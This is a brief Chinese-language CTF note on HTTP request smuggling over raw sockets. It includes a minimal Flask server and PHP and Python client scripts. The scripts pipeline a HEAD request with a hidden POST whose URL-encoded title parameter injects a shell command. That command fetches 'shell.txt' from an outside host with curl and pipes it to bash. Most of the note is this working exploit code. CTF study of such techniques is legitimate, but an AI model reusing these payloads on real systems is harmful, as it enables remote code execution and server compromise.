socket发送http请求时的走私

简述

这是在做一道CTF题目时遇到的，这儿稍微记录一下

code

服务端

#!/usr/bin/env python3
# i use arch btw

from flask import Flask, render_template, request
from werkzeug.serving import WSGIRequestHandler, BaseWSGIServer

import subprocess
import json

app = Flask(__name__)



@app.route('/',methods = ['GET', 'POST','HEAD'])
def index():
    print("请求一")
    return 'result -1'


@app.route('/api/v1/notes/', methods = ['GET', 'POST'])
def notes():
    print("请求二")
    return "result -2"


WSGIRequestHandler.protocol_version = "HTTP/1.1"
app.run(host='0.0.0.0', port=3337, debug=False)

php走私

<?php 
  $srv_ip = '127.0.0.1';//你的目标服务地址. 
  $srv_port = 3337;//端口 
  $url = '/api/v1/notes/'; //接收你post的URL具体地址  
  $fp = ''; 
  $errno = 0;//错误处理 
  $errstr = '';//错误处理 
  $timeout = 10;//多久没有连上就中断 
  $post_str = "username=demo&password=hahaha";//要提交的内容. 
  //打开网络的 Socket 链接。 
  $fp = fsockopen($srv_ip,$srv_port,$errno,$errstr,$timeout); 
  if (!$fp){ 
   echo('fp fail'); 
  } 
  $content_length = strlen($post_str); 
  $post_header = "HEAD / HTTP/1.1\r\n"; 
  $post_header .= "Connection: keep-alive\r\n"; 
  $post_header .= "Host: 127.0.0.1\r\n\r\n"; 
  $post_header .= "POST /api/v1/notes/?title=%27%3Bcurl%20http%3A//gem-love.com/shell.txt%7Cbash%20%23 HTTP/1.1\r\n"; 
  $post_header .= "User-Agent: archlinux\r\n"; 
  $post_header .= "Accept: */*\r\n\r\n"; 
  //$post_header .= $post_str."\r\n\r\n"; 
  fwrite($fp,$post_header); 
 
  $inheader = 1; 
  while(!feof($fp)){//测试文件指针是否到了文件结束的位置 
   $line = fgets($fp,1024); 
   //去掉请求包的头信息 
   if ($inheader && ($line == "\n" || $line == "\r\n")) { 
         $inheader = 0; 
    } 
    if ($inheader == 0) { 
      echo $line; 
    } 
  } 
  fclose($fp); 
  unset ($line); 
?> 

python走私

import requests
import socket
from urllib.parse import quote as urlen
def check_link():
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(("127.0.0.1", 3337))
            wef=(b'HEAD / HTTP/1.1\r\nConnection: keep-alive\r\nHost: 127.0.0.1\r\n\r\nPOST /api/v1/notes/?title=%27%3Bcurl%20http%3A//gem-love.com/shell.txt%7Cbash%20%23 HTTP/1.1\r\nUser-Agent: archlinux\r\n\r\n') 
            print(wef.decode("utf-8"))
            s.send(wef)
            try:
                s.settimeout(4)
            except:
                pass
            rEspONSe = s.recv(4096)
            if b'200 OK' in rEspONSe:
                s.close()
                return True
            s.close()
            return False
        except Exception as e:
            traceback.print_exc()
            print(e)
            return False
        return bool(False)



check_link()

发送的http数据包为：

HEAD / HTTP/1.1
Connection: keep-alive
Host: 127.0.0.1

POST /api/v1/notes/?title=%27%3Bcurl%20http%3A//gem-love.com/shell.txt%7Cbash%20%23 HTTP/1.1
Content-Length: 6
User-Agent: archlinux
Accept: */*

即每个包最后都会跟一个\r\n，然后后面接POST发送的数据，而POST数据不用加\r\n